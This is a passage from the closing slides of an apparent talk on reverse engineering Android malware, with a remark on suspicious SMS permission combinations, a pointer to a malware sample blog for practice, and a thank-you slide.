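None of the three findings is damning on its own (a legitimate SMS app needs the receiver, and some need SEND_SMS); all three together, with no disclosure to the user, is the combination the slide is asking about.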
Page 85
Awesome!
• So you didn’t fall asleep?
• Interested in reversing?
• But what can I reverse!
• http://contagiominidump.blogspot.com
Page 86
Now – in Java (magic happened to D.k())
Page 87
Thanks!
‣ [email protected]
‣ [email protected]
‣ [email protected]